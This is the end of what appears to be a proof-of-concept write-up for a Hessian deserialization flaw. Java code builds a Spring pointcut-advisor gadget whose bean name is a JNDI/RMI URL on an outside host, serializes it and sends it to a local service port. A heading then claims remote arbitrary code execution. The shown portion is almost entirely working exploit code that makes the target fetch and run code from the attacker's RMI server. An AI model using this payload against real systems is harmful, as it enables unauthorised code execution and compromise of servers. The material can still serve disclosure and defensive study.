        DefaultBeanFactoryPointcutAdvisor pcadv = new DefaultBeanFactoryPointcutAdvisor();
        pcadv.setBeanFactory(bf);
        pcadv.setAdviceBeanName("rmi://192.168.31.5:1099/vorbxa");

        DefaultBeanFactoryPointcutAdvisor pcadv2 = new DefaultBeanFactoryPointcutAdvisor();
        pcadv2.setAdviceBeanName("rmi://192.168.31.5:1099/vorbxa");
        Object obj = JDKUtil.makeMap(pcadv2, pcadv);

        HessianSerializer serializer = new HessianSerializer();
        byte\[\] bytes = serializer.serialize(obj);
        // serializer.deserialize(bytes, null);

        int length = bytes.length;
        byte\[\] newArray = new byte\[length + 4\];
        newArray\[0\] = (byte) ((length >> 24) & 0xFF);
        newArray\[1\] = (byte) ((length >> 16) & 0xFF);
        newArray\[2\] = (byte) ((length >> 8) & 0xFF);
        newArray\[3\] = (byte) (length & 0xFF);
        System.arraycopy(bytes, 0, newArray, 4, length);
        Socket socket = new Socket("127.0.0.1", 7080);
        OutputStream outputStream = socket.getOutputStream();
        outputStream.write(newArray);
        outputStream.flush();
        outputStream.close();

    }

}

****Vulnerability Impact****

This attack can cause remote arbitrary code execution

****Display of attack results(Remote Code Execute)****

Tag

#sql